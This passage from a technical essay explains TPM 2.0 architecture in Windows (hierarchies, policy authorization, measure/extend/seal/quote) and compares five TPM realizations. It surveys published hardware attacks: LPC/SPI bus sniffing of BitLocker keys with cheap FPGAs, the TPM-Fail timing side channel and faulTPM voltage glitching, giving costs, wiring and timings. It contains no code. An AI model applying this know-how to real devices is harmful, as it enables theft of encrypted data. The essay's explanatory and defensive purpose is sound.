&lt;p&gt;Four conceptual changes carry the architecture.&lt;/p&gt;
&lt;h3&gt;4.1 Algorithm agility&lt;/h3&gt;
&lt;p&gt;Every cryptographic algorithm in TPM 2.0 carries an integer identifier. PCRs no longer have a single hash; they have &lt;em&gt;banks&lt;/em&gt;, one per supported algorithm, all extended in parallel by a single command. Microsoft&apos;s own documentation [@ms-learn-how-windows-uses-tpm] describes the contract: when firmware extends PCR[0] with the IBV&apos;s CRTM measurement, the TPM extends both the SHA-1 bank and the SHA-256 bank, and on newer parts the SHA-384 bank as well.The PC Client Platform TPM Profile mandates SHA-1 + SHA-256 minimum, not SHA-256-only. Backwards compatibility had a cost. Future-proofing against SHA-3 and post-quantum algorithms is now a matter of registering a new ID, not replacing silicon.&lt;/p&gt;

A property of a cryptographic protocol or device whereby the choice of hash, signature, or encryption algorithm is decoupled from the protocol&apos;s data structures. Algorithm-agile systems carry algorithm identifiers alongside their cryptographic blobs, so a new algorithm can be added by registering an ID rather than by re-laying out the wire format. TPM 2.0 is algorithm-agile; TPM 1.x was not.
&lt;h3&gt;4.2 Four hierarchies, four primary seeds&lt;/h3&gt;
&lt;p&gt;Where TPM 1.x had a single SRK, TPM 2.0 has four hierarchies -- Platform, Endorsement, Storage, Null -- each rooted in a per-hierarchy &lt;em&gt;primary seed&lt;/em&gt;. Primary keys are derived deterministically: call &lt;code&gt;TPM2_CreatePrimary&lt;/code&gt; with the same template against the same seed, and you get the same key back, byte-for-byte. The Apress textbook by Arthur, Challener, and Goldman [@arthur-challener-goldman-2015] -- the de-facto developer reference for the spec -- describes this as the architectural fix to a real operational problem: the platform owner can clear the storage hierarchy without losing the device&apos;s endorsement identity.&lt;/p&gt;

flowchart TD
    subgraph Platform[&quot;Platform Hierarchy&lt;br /&gt;(firmware-only)&quot;]
      PSeed[&quot;Platform Primary Seed&quot;]
      PSRK[&quot;Platform SRK&quot;]
      PSeed --&amp;gt; PSRK
    end
    subgraph Endorsement[&quot;Endorsement Hierarchy&lt;br /&gt;(privacy-sensitive)&quot;]
      ESeed[&quot;Endorsement Primary Seed&quot;]
      EK[&quot;EK&quot;]
      AK[&quot;AK&lt;br /&gt;(restricted signing)&quot;]
      ESeed --&amp;gt; EK
      ESeed --&amp;gt; AK
      EK -. cert .-&amp;gt; AK
    end
    subgraph Storage[&quot;Storage Hierarchy&lt;br /&gt;(owner-cleared)&quot;]
      SSeed[&quot;Storage Primary Seed&quot;]
      SRK[&quot;SRK&quot;]
      Sealed[&quot;Sealed VMK&lt;br /&gt;(BitLocker)&quot;]
      Bound[&quot;Hello key&lt;br /&gt;(per-user)&quot;]
      SSeed --&amp;gt; SRK
      SRK --&amp;gt; Sealed
      SRK --&amp;gt; Bound
    end
    subgraph Null[&quot;Null Hierarchy&lt;br /&gt;(reset on every reboot)&quot;]
      NSeed[&quot;Null Primary Seed&lt;br /&gt;(per-boot random)&quot;]
    end
&lt;h3&gt;4.3 Enhanced Authorization&lt;/h3&gt;
&lt;p&gt;The most interesting change is how TPM 2.0 talks about access control. Every protected object has a &lt;code&gt;policyDigest&lt;/code&gt;, an algorithm-agile hash of an arbitrarily complex set of conditions. To use the object, the caller starts a policy session (&lt;code&gt;TPM2_StartAuthSession&lt;/code&gt; with &lt;code&gt;TPM_SE_POLICY&lt;/code&gt;) and walks predicates -- &lt;code&gt;TPM2_PolicyPCR&lt;/code&gt;, &lt;code&gt;TPM2_PolicyAuthorize&lt;/code&gt;, &lt;code&gt;TPM2_PolicySigned&lt;/code&gt;, &lt;code&gt;TPM2_PolicyCommandCode&lt;/code&gt;, &lt;code&gt;TPM2_PolicyAuthValue&lt;/code&gt; -- each extending the running session digest. At the end, the TPM checks that the session digest matches the object&apos;s &lt;code&gt;policyDigest&lt;/code&gt;, and only then authorizes the operation. BitLocker, in its current Microsoft Learn description [@ms-learn-bitlocker], uses this to seal the Volume Master Key to PCR[7] (Secure Boot policy) and PCR[11] (BitLocker control flags). Any tampering with Secure Boot configuration -- or any non-BitLocker boot path -- causes unseal to fail.&lt;/p&gt;

TPM 2.0&apos;s flexible authorization mechanism. Each protected object carries a hash (policyDigest) of the predicates required to use it. A caller builds an equivalent digest by walking a sequence of TPM2_Policy* commands inside a policy session; the TPM only authorizes the operation if the two digests match. This is the mechanism that lets BitLocker bind the VMK to specific PCR values, lets Hello bind a key to a PIN gesture with anti-hammering, and lets attestation servers compose policies they did not design into the chip.
&lt;h3&gt;4.4 The unifying primitive: measure, extend, seal, quote&lt;/h3&gt;
&lt;p&gt;The reason any of this matters for Windows is that the entire feature surface compresses down to four operations on the same set of registers.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Measure.&lt;/strong&gt; A piece of code computes the hash of the next piece of code (or configuration) about to run.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extend.&lt;/strong&gt; That hash is folded into a PCR via &lt;code&gt;PCR_new = H(PCR_old || hash)&lt;/code&gt;. The operation is one-way: PCRs cannot be rewound.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seal.&lt;/strong&gt; A symmetric key (or arbitrary blob) is encrypted under the TPM&apos;s Storage hierarchy with a &lt;code&gt;policyDigest&lt;/code&gt; that names a specific set of PCR values. &lt;code&gt;TPM2_Unseal&lt;/code&gt; releases the blob if and only if the live PCR state matches.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Quote.&lt;/strong&gt; The TPM signs a snapshot of selected PCRs with an Attestation Key. A remote verifier can check the signature against a known AKpub and an EK certificate chain.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The boot of a measured Windows machine is exactly this loop. The Core Root of Trust for Measurement -- a small piece of immutable firmware -- measures the next stage and extends PCR[0]. Each stage measures the next: PCR[2] for option ROMs, PCR[4] for the Windows Boot Manager, PCR[7] for the Secure Boot policy, PCR[11] for BitLocker volume control flags, and on through ELAM and the kernel. Microsoft&apos;s Trusted Boot description [@ms-learn-secure-boot-process] walks the chain.&lt;/p&gt;

sequenceDiagram
    participant FW as Firmware (CRTM)
    participant BM as Bootmgr
    participant Win as Windows kernel
    participant TPM as TPM
    FW-&amp;gt;&amp;gt;TPM: PCR_Extend(PCR[0], H(firmware))
    FW-&amp;gt;&amp;gt;BM: Hand off
    BM-&amp;gt;&amp;gt;TPM: PCR_Extend(PCR[4], H(bootmgr))
    BM-&amp;gt;&amp;gt;TPM: PCR_Extend(PCR[7], H(SecureBoot policy))
    BM-&amp;gt;&amp;gt;Win: Hand off
    Win-&amp;gt;&amp;gt;TPM: PCR_Extend(PCR[11], H(BitLocker control))
    Win-&amp;gt;&amp;gt;TPM: TPM2_Unseal(VMK, policyDigest = PCR[7],PCR[11])
    TPM--&amp;gt;&amp;gt;Win: VMK if PCRs match policy, else error
&lt;p&gt;Now compress the Windows feature catalogue against those four operations.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;BitLocker [@ms-learn-bitlocker] seals the VMK to a PCR policy.&lt;/li&gt;
&lt;li&gt;Measured Boot and Device Health Attestation [@ms-learn-azure-measured-boot] quote PCRs to a remote verifier.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; [@ms-learn-credential-guard] seals the VBS-isolated NTLM/Kerberos secrets with a policy that includes the VBS measurement.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello for Business&lt;/a&gt; [@ms-learn-hello-for-business] creates a per-user RSA-2048 or P-256 key whose authorization policy requires the PIN gesture and is bounded by the TPM&apos;s anti-hammering counter.&lt;/li&gt;
&lt;li&gt;Virtual smart cards, DPAPI-NG, and TPM key attestation [@ms-learn-tpm-key-attestation] for ADCS-issued certificates all sit on the same primitives.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; BitLocker, Measured Boot, Credential Guard, Windows Hello, virtual smart cards, DPAPI-NG, and TPM key attestation are not seven independent uses of a chip. They are seven &lt;em&gt;policy expressions&lt;/em&gt; over the same four operations -- measure, extend, seal, quote -- on the same PCR set. The TPM is not a checkbox shared by features. It is one primitive that &lt;em&gt;defines&lt;/em&gt; what hardware-rooted security can do in Windows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; One primitive -- measure, extend, seal, quote -- underwrites every Windows hardware-rooted security feature shipped since Vista. The TPM&apos;s value to Windows is not a list of cryptographic operations. It is a single, composable contract: &quot;this key only releases when the boot looks like &lt;em&gt;this&lt;/em&gt;.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;By July 28, 2016, TPM 2.0 was a hidden contractual requirement under the entire Windows OEM channel. By June 24, 2021, Microsoft made the same chip the visible install gate for Windows 11. The architecture had won the building. Then attackers started taking it apart.&lt;/p&gt;
&lt;h2&gt;5. The threat model collapses inward (2019-2024)&lt;/h2&gt;
&lt;p&gt;On March 13, 2019, a New Zealand security researcher named Denis Andzakovic posted a blog entry [@andzakovic-2019-tpm-sniffing] that, in retrospect, started the modern era of TPM offense. He demonstrated two LPC-bus sniffing attacks on two different machines. On an HP business laptop running TPM 1.2, he used a DSLogic Plus logic analyzer connected via the laptop&apos;s debug header (7 wires: LCLK, LFRAME, LAD[0:3], and ground) to lift the BitLocker Volume Master Key off the LPC bus. On a Surface Pro 3 running TPM 2.0, he spent $40 NZD on a Lattice iCE40 ICEStick FPGA (8 connections: GND, LCLK, LFRAME#, LRESET#, LAD[0:3]) and replicated the attack. With the disk in hand and the motherboard accessible, a thief could decrypt a TPM-only BitLocker volume in the time it took to boot it once. Andzakovic open-sourced the FPGA gateware [@andzakovic-lpc-sniffer-code] the same day.Andzakovic credits Hector Martin (&lt;code&gt;@marcan&lt;/code&gt;) for prototyping LPC sniffing earlier; the 2019 write-up was the first end-to-end public demonstration with reproducible code.&lt;/p&gt;
&lt;p&gt;The structural insight, which has not been backed away from, is that Windows does not enable TPM 2.0 &lt;em&gt;parameter encryption&lt;/em&gt; on the BitLocker boot path. The VMK travels in plaintext at the LPC bus&apos;s 33 MHz clock across a few millimetres of PCB.Why doesn&apos;t Windows turn on parameter encryption for BitLocker? The boot-time pressure is real -- pre-OS code lives in a tight memory budget and parameter encryption requires HMAC-signed sessions. The pragmatic mitigation Microsoft documents is preboot authentication (PIN or startup key), which makes the bus-sniffed VMK insufficient on its own.&lt;/p&gt;
&lt;p&gt;The attack would not stay a one-laptop curio. In late 2020, F-Secure&apos;s (later WithSecure) Henri Nurmi released an SPI variant [@withsecure-2020-spi-sniffing] and a public BitLocker-key extraction tool. A year later, Thomas Dewaele and Julien Oberson at SCRT reproduced the LPC attack [@scrt-2021-tpm-sniffing] on a Lenovo ThinkPad L440 with a chip (labeled P24JPVSP, identified by SCRT as probably equivalent to the ST33TPM12LPC) and published a tutorial. By October 2024, SCRT had industrialized the attack [@scrt-2024-bitlocker-pin] across &quot;the three major enterprise-grade laptop manufacturers (i.e. Lenovo, HP, and Dell)&quot; in &quot;a few minutes.&quot;&lt;/p&gt;
&lt;p&gt;The first reassurance the industry reached for was: ship the TPM inside the chipset. No bus, no sniff. Both Intel (Platform Trust Technology, fTPM-in-CSME [@wikipedia-intel-me]) and AMD (fTPM-in-PSP) had already done this for cost reasons. The second reassurance lasted eight months.&lt;/p&gt;
&lt;p&gt;In November 2019, Daniel Moghimi, Berk Sunar, Thomas Eisenbarth, and Nadia Heninger -- soon to be USENIX Security 2020 -- released TPM-Fail [@tpmfail-microsite]. Their finding: Intel PTT and a STMicro ST33 dTPM both leaked ECDSA private keys through ordinary timing side channels in their scalar multiplication. The numbers were brutal:&lt;/p&gt;

A local adversary can recover the ECDSA key from Intel fTPM in 4-20 minutes depending on the access level. We even show that these attacks can be performed remotely on fast networks, by recovering the authentication key of a virtual private network (VPN) server in 5 hours. -- TPM-Fail, tpm.fail [@tpmfail-microsite], 2019
&lt;p&gt;NVD assigned CVE-2019-11090 [@cve-2019-11090] to Intel PTT and CVE-2019-16863 [@cve-2019-16863] to STMicroelectronics&apos; ST33TPHF2ESPI. The latter entry is blunt: &quot;STMicroelectronics ST33TPHF2ESPI TPM devices before 2019-09-12 allow attackers to extract the ECDSA private key via a side-channel timing attack because ECDSA scalar multiplication is mishandled, aka TPM-FAIL.&quot; Both chips were certified at the moment of disclosure -- the STMicro chip held both Common Criteria EAL4+ and FIPS 140-2 Level 2, while the Intel chip held FIPS 140-2 [@tpmfail-microsite]. Certification did not catch the bug. The presentation is preserved in the USENIX Security 2020 proceedings [@moghimi-2020-usenix-tpmfail].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Removing the bus did not remove the attack surface. It relocated it from the PCB to the trusted execution environment that hosted the firmware TPM. The fTPM closes one channel and opens another -- and the certification regime that was supposed to catch both missed the timing leak in chips that had passed their respective certification programmes (STMicro: Common Criteria EAL4+ and FIPS 140-2 Level 2; Intel: FIPS 140-2). The &quot;fTPM has no bus to sniff&quot; reassurance was a category error.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The final beat came four years later. In April 2023, Hans Niklas Jacob, Christian Werling, Robert Buhren, and Jean-Pierre Seifert posted faulTPM (arXiv:2304.14717) [@jacob-2023-faultpm], with reproducible code at github.com/PSPReverse/ftpm_attack [@pspreverse-ftpm-attack]. The attack: voltage-glitch the AMD Platform Security Processor and walk out with the entire internal TPM state. The paper&apos;s own claim is the sentence that, more than any other, framed the modern TPM threat model.&lt;/p&gt;

this vulnerability exposes the complete internal TPM state of the fTPM. It allows us to extract any cryptographic material stored or sealed by the fTPM regardless of authentication mechanisms such as Platform Configuration Register validation or passphrases with anti-hammering protection. -- Jacob, Werling, Buhren, Seifert, faulTPM (2023) [@jacob-2023-faultpm]
&lt;p&gt;Two to three hours of physical access. Anti-hammering bypassed because anti-hammering is enforced by the TPM, and once the TPM&apos;s internal state is on your bench you set the counter to zero. PCR-policy bypassed because the sealed blob&apos;s wrapping key is in the extracted state. The structural punch is that this makes BitLocker TPM+PIN on AMD fTPM with a low-entropy PIN &lt;em&gt;less&lt;/em&gt; secure than a TPM-less passphrase (a corollary the faulTPM paper makes explicit [@jacob-2023-faultpm]): the TPM concentrates all your trust into a chip whose internal state can be exfiltrated.&lt;/p&gt;

timeline
    title Three generations of TPM attack
    section Bus sniffing
      2019 March : Andzakovic - \$40 FPGA, BitLocker VMK off LPC bus
      2020 December : WithSecure - SPI variant and key-extraction tool
      2021 November : SCRT reproduces on Lenovo ThinkPad L440
      2024 October : SCRT - few-minute attack on Lenovo, HP, Dell
    section Side channel in fTPM
      2019 November : TPM-Fail (Moghimi, Sunar, Eisenbarth, Heninger)
      2019 November : CVE-2019-11090 (Intel PTT), CVE-2019-16863 (STMicro)
    section Fault injection in fTPM
      2023 April : faulTPM - full AMD fTPM state extracted in 2-3 h
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack class&lt;/th&gt;
&lt;th&gt;TPM form&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;th&gt;Time&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;LPC bus sniffing (BitLocker VMK)&lt;/td&gt;
&lt;td&gt;Discrete TPM 1.2 / 2.0&lt;/td&gt;
&lt;td&gt;$0 (logic analyzer) -- ~$40 NZD (iCE40 FPGA, Surface Pro 3)&lt;/td&gt;
&lt;td&gt;Minutes once wired&lt;/td&gt;
&lt;td&gt;Andzakovic 2019; SCRT 2021/2024&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPI bus sniffing&lt;/td&gt;
&lt;td&gt;Discrete TPM 2.0&lt;/td&gt;
&lt;td&gt;~$50 (logic analyzer)&lt;/td&gt;
&lt;td&gt;Minutes once wired&lt;/td&gt;
&lt;td&gt;WithSecure 2020-2024&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Timing side channel on ECDSA&lt;/td&gt;
&lt;td&gt;Intel PTT, STMicro ST33&lt;/td&gt;
&lt;td&gt;Software-only&lt;/td&gt;
&lt;td&gt;4-20 min local; 5 h remote VPN&lt;/td&gt;
&lt;td&gt;TPM-Fail 2019/2020&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Voltage glitch on PSP&lt;/td&gt;
&lt;td&gt;AMD fTPM&lt;/td&gt;
&lt;td&gt;~$200 (glitching rig)&lt;/td&gt;
&lt;td&gt;2-3 h physical&lt;/td&gt;
&lt;td&gt;faulTPM 2023&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;If a $40 FPGA defeats discrete TPM, a network packet defeats Intel PTT, and a few hours of physical access defeats AMD fTPM completely -- where does the next generation of TPM live? Microsoft&apos;s answer was on the CPU die itself.&lt;/p&gt;
&lt;h2&gt;6. State of the art: five realizations of one specification&lt;/h2&gt;
&lt;p&gt;All five chips in this section pass the same TCG conformance suite. They expose the same &lt;code&gt;TPM2_*&lt;/code&gt; command surface to Windows. They fail to completely different attackers. The architecture is identical; the &lt;em&gt;attack surface&lt;/em&gt; is everything.&lt;/p&gt;

A *discrete* TPM is a separate chip on the motherboard, talking to the host over LPC, SPI, or I2C. A *firmware* TPM is a TPM 2.0 implementation running inside an existing trusted execution environment on the host -- Intel CSME (Platform Trust Technology), AMD PSP (fTPM), or a dedicated Microsoft IP block (Pluton). Both pass the same TCG specification; they differ in physical location, attack surface, and update channel.

A zero-knowledge protocol that lets a TPM prove &quot;I am a real TPM certified by vendor X&quot; without revealing which chip is talking. Replaces the TPM 1.2 Privacy CA model, which required a third-party CA to mediate every attestation. ECDAA is the elliptic-curve variant standardized in TPM 2.0.
&lt;h3&gt;6.1 Discrete TPM&lt;/h3&gt;
&lt;p&gt;The classical chip. Infineon, STMicroelectronics, Nuvoton. Hangs off the motherboard&apos;s LPC, SPI, or I2C bus. Best certifications (Common Criteria EAL4+, FIPS 140-2/3). One bug class: bus sniffing in minutes for $40 against the BitLocker boot path that Windows leaves in plaintext.&lt;/p&gt;
&lt;h3&gt;6.2 Intel PTT&lt;/h3&gt;
&lt;p&gt;TPM 2.0 inside the Converged Security and Management Engine -- historically on the Platform Controller Hub die, and increasingly on the SoC die in integrated-platform Intel processors since Tiger Lake. Either way, no physical bus to sniff. Defeated by TPM-Fail [@tpmfail-microsite] timing side channel; firmware-patched, but inherits CSME&apos;s broader attack surface and CSME&apos;s update story (UEFI capsule via OEM, lifecycle entirely under the OEM&apos;s control).&lt;/p&gt;
&lt;h3&gt;6.3 AMD fTPM (PSP)&lt;/h3&gt;
&lt;p&gt;TPM 2.0 inside the AMD Platform Security Processor [@wikipedia-amd-psp] (an ARM TrustZone Cortex-A5 core integrated into every modern Ryzen SoC). Ships in essentially all Ryzen-class client SoCs since 2017. No physical bus to sniff. Defeated end-to-end by the faulTPM [@jacob-2023-faultpm] voltage-glitch attack against the PSP. The structural problem is shared TEE: the same coprocessor is responsible for memory encryption setup, secure-boot enforcement, and TPM service, and a single fault-injection path drops all of those.&lt;/p&gt;
&lt;h3&gt;6.4 Microsoft Pluton&lt;/h3&gt;
&lt;p&gt;A Microsoft IP block on the CPU SoC die, with Microsoft-authored Rust firmware (on 2024 AMD and Intel platforms) [@ms-learn-pluton] delivered through Windows Update. According to Microsoft&apos;s hardware list, Pluton &quot;is currently available on devices with the following chipsets running on Windows 11: AMD: Ryzen 6000, 7000, 8000, 9000 and Ryzen AI Series ... Intel: Core Series Processors -- Ultra 200V Series, Ultra Series 3 and Series 3 ... Qualcomm: Snapdragon 8cx Gen 3 and Snapdragon X Series.&quot; The same page notes that &quot;Pluton platforms in 2024 AMD and Intel systems will start to use a Rust-based firmware foundation given the importance of memory safety.&quot;&lt;/p&gt;
&lt;p&gt;The thesis is laid out in Microsoft&apos;s November 17, 2020 announcement post [@ms-pluton-blog-2020], which links explicitly to Andzakovic. The architectural framing is unusually direct.&lt;/p&gt;

The Pluton design removes the potential for that communication channel to be attacked by building security directly into the CPU. -- Microsoft Security Blog, November 17, 2020 [@ms-pluton-blog-2020]
&lt;p&gt;Three things change at once. The bus is gone -- Pluton is on-die, so dTPM bus-sniffing has no surface to attack. The TEE host is dedicated -- Pluton is not the same coprocessor that runs SEV memory encryption or ME runtime services. And the firmware ships through Windows Update -- so when a Pluton firmware vulnerability is found (and one will be found), the patch reaches the deployed fleet through Windows Update rather than through OEM UEFI capsule rollouts.The Pluton-as-TPM page makes the trade-off explicit: &quot;Microsoft Pluton can be used as a TPM, or with a TPM. Although Pluton builds security directly into the CPU, device manufacturers might choose to use discrete TPM as the default TPM.&quot; [@ms-learn-pluton-as-tpm] Several enterprise security teams have publicly cited the Pluton update model as a reason to keep dTPM as their default for high-assurance fleets even where Pluton silicon is available.&lt;/p&gt;
&lt;h3&gt;6.5 vTPM&lt;/h3&gt;
&lt;p&gt;A software TPM emulation, typically inside a hypervisor. Azure Trusted Launch [@ms-learn-azure-trusted-launch] is Microsoft&apos;s flagship implementation: &quot;Trusted Launch is the default state for newly created Azure Gen2 VM and scale sets.&quot; The vTPM lives in a host-protected memory region and inherits the trust of the host. For cloud workloads where the threat model already includes &quot;the hypervisor host is honest,&quot; this is the right shape; for adversarial physical access, it is not.&lt;/p&gt;
&lt;h3&gt;6.6 Head-to-head&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;dTPM&lt;/th&gt;
&lt;th&gt;Intel PTT&lt;/th&gt;
&lt;th&gt;AMD fTPM&lt;/th&gt;
&lt;th&gt;Pluton&lt;/th&gt;
&lt;th&gt;vTPM&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Physical location&lt;/td&gt;
&lt;td&gt;Separate chip&lt;/td&gt;
&lt;td&gt;CSME (PCH die)&lt;/td&gt;
&lt;td&gt;PSP (CPU die)&lt;/td&gt;
&lt;td&gt;Dedicated IP block on CPU die&lt;/td&gt;
&lt;td&gt;Hypervisor memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bus to host&lt;/td&gt;
&lt;td&gt;LPC / SPI / I2C&lt;/td&gt;
&lt;td&gt;None (on-die)&lt;/td&gt;
&lt;td&gt;None (on-die)&lt;/td&gt;
&lt;td&gt;None (on-die)&lt;/td&gt;
&lt;td&gt;None (virtual)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TEE shared with&lt;/td&gt;
&lt;td&gt;none (own die)&lt;/td&gt;
&lt;td&gt;CSME&lt;/td&gt;
&lt;td&gt;PSP (large)&lt;/td&gt;
&lt;td&gt;none (Pluton-only)&lt;/td&gt;
&lt;td&gt;host kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Side-channel exposure&lt;/td&gt;
&lt;td&gt;Implementation-dependent&lt;/td&gt;
&lt;td&gt;TPM-Fail patched&lt;/td&gt;
&lt;td&gt;faulTPM unaddressed structurally&lt;/td&gt;
&lt;td&gt;Limited public research&lt;/td&gt;
&lt;td&gt;host-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Update channel&lt;/td&gt;
&lt;td&gt;UEFI capsule&lt;/td&gt;
&lt;td&gt;UEFI capsule (CSME)&lt;/td&gt;
&lt;td&gt;UEFI capsule (PSP)&lt;/td&gt;
&lt;td&gt;Windows Update&lt;/td&gt;
&lt;td&gt;hypervisor patch&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Certifications&lt;/td&gt;
&lt;td&gt;EAL4+, FIPS 140-2/3&lt;/td&gt;
&lt;td&gt;EAL4+&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OEM cost&lt;/td&gt;
&lt;td&gt;per-chip BOM&lt;/td&gt;
&lt;td&gt;bundled&lt;/td&gt;
&lt;td&gt;bundled&lt;/td&gt;
&lt;td&gt;bundled&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best-known attack&lt;/td&gt;
&lt;td&gt;LPC/SPI sniffing in minutes&lt;/td&gt;
&lt;td&gt;TPM-Fail timing&lt;/td&gt;
&lt;td&gt;faulTPM full state&lt;/td&gt;
&lt;td&gt;None public at faulTPM depth&lt;/td&gt;
&lt;td&gt;host compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Algorithm agility&lt;/td&gt;
&lt;td&gt;spec-required&lt;/td&gt;
&lt;td&gt;spec-required&lt;/td&gt;
&lt;td&gt;spec-required&lt;/td&gt;
&lt;td&gt;spec-required + Rust firmware updates&lt;/td&gt;
&lt;td&gt;spec-required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best fit&lt;/td&gt;
&lt;td&gt;Compliance-driven, high-assurance fleets&lt;/td&gt;
&lt;td&gt;Existing Intel platforms&lt;/td&gt;
&lt;td&gt;Existing AMD platforms&lt;/td&gt;
&lt;td&gt;Default for Windows 11 client&lt;/td&gt;
&lt;td&gt;Cloud workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    subgraph TPMs[&quot;Five realizations&quot;]
      dTPM[&quot;Discrete TPM&lt;br /&gt;(LPC/SPI/I2C)&quot;]
      PTT[&quot;Intel PTT&lt;br /&gt;(CSME)&quot;]
      AMD[&quot;AMD fTPM&lt;br /&gt;(PSP)&quot;]
      Pluton[&quot;Microsoft Pluton&lt;br /&gt;(on-die, Rust, WU)&quot;]
      vTPM[&quot;vTPM&lt;br /&gt;(Hyper-V / Azure)&quot;]
    end
    subgraph Surface[&quot;TCG2 command surface&quot;]
      TCG[&quot;TPM2_* commands&quot;]
    end
    dTPM --&amp;gt; TCG
    PTT --&amp;gt; TCG
    AMD --&amp;gt; TCG
    Pluton --&amp;gt; TCG
    vTPM --&amp;gt; TCG
    TCG --&amp;gt; BL[&quot;BitLocker VMK seal&quot;]
    TCG --&amp;gt; MB[&quot;Measured Boot / DHA&quot;]
    TCG --&amp;gt; CG[&quot;Credential Guard&quot;]
    TCG --&amp;gt; WH[&quot;Windows Hello&quot;]
    TCG --&amp;gt; VSC[&quot;Virtual smart cards&quot;]
    TCG --&amp;gt; DPAPI[&quot;DPAPI-NG&quot;]
    TCG --&amp;gt; KA[&quot;TPM key attestation (ADCS)&quot;]
&lt;p&gt;The deep claim of the Pluton design is not that it is a better cryptoprocessor. It is that the previous decade&apos;s lesson -- TEE memory-safety bugs are systemic, certification did not catch them, and OEM UEFI capsule patching is too slow -- argues for moving the firmware signer to Microsoft and the firmware language to Rust. That is a political choice, not just a technical one. The October 2019 Secured-core PCs initiative [@ms-secured-core-blog-2019] was the first public step; Pluton is its descendant.&lt;/p&gt;
&lt;p&gt;If you can sniff a dTPM, time-attack an Intel PTT, glitch an AMD fTPM, and trust Microsoft to sign your Pluton firmware -- which threat are you actually defending against?&lt;/p&gt;
&lt;h2&gt;7. Theoretical limits: what a passive cryptoprocessor cannot do&lt;/h2&gt;
&lt;p&gt;A famous joke in the trusted-computing community: the TPM cannot make a compromised OS uncompromised. It can only make sure that nothing else helped.&lt;/p&gt;
&lt;p&gt;Three impossibility-style results follow from the architecture itself, regardless of which of the five realizations you pick.&lt;/p&gt;
&lt;h3&gt;7.1 The TPM is a Root of Trust for Storage and Reporting, not Execution&lt;/h3&gt;
&lt;p&gt;The Core Root of Trust for Measurement -- the immutable code that bootstraps the measurement chain -- lives in firmware, not in the TPM. The TPM cannot detect that the wrong code measured itself; it can only refuse to release sealed material when the PCRs do not match the stored policy. If the CRTM is compromised (or a downstream measurement is forged before extension), the TPM has no way to know.&lt;/p&gt;
&lt;p&gt;Stronger guarantees require an &lt;em&gt;active&lt;/em&gt; root of trust: a Dynamic Root of Trust for Measurement, where the CPU enters a known good state late in the boot and re-measures from there. Intel TXT, AMD SVM-SKINIT, and Microsoft&apos;s System Guard Secure Launch [@ms-learn-system-guard] on Secured-core PCs all implement this. The TPM is a participant in DRTM; on its own, it is not sufficient.&lt;/p&gt;
&lt;h3&gt;7.2 TPM-only BitLocker has a structural lower bound&lt;/h3&gt;
&lt;p&gt;The VMK must enter RAM during Trusted Boot before the user authenticates. This is not a bug; it is the threat-model definition of &quot;TPM-only.&quot; Therefore &lt;em&gt;any&lt;/em&gt; attacker who intercepts the VMK at the moment of release defeats TPM-only BitLocker, regardless of TPM strength. This is what every dTPM bus-sniffing attack actually exploits -- not a weakness of the TPM, but the structural condition that the key must traverse the boot path.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s countermeasures documentation [@ms-learn-bitlocker-countermeasures] names the mitigation in plain terms: preboot authentication. Adding TPM+PIN raises the bound to &quot;guess the PIN against intact anti-hammering&quot; -- but only as long as the TPM&apos;s anti-hammering counter cannot be exfiltrated. faulTPM violates that condition for AMD fTPM. On a Pluton or hardened dTPM, anti-hammering still holds, and a sufficiently random PIN closes the bound.&lt;/p&gt;
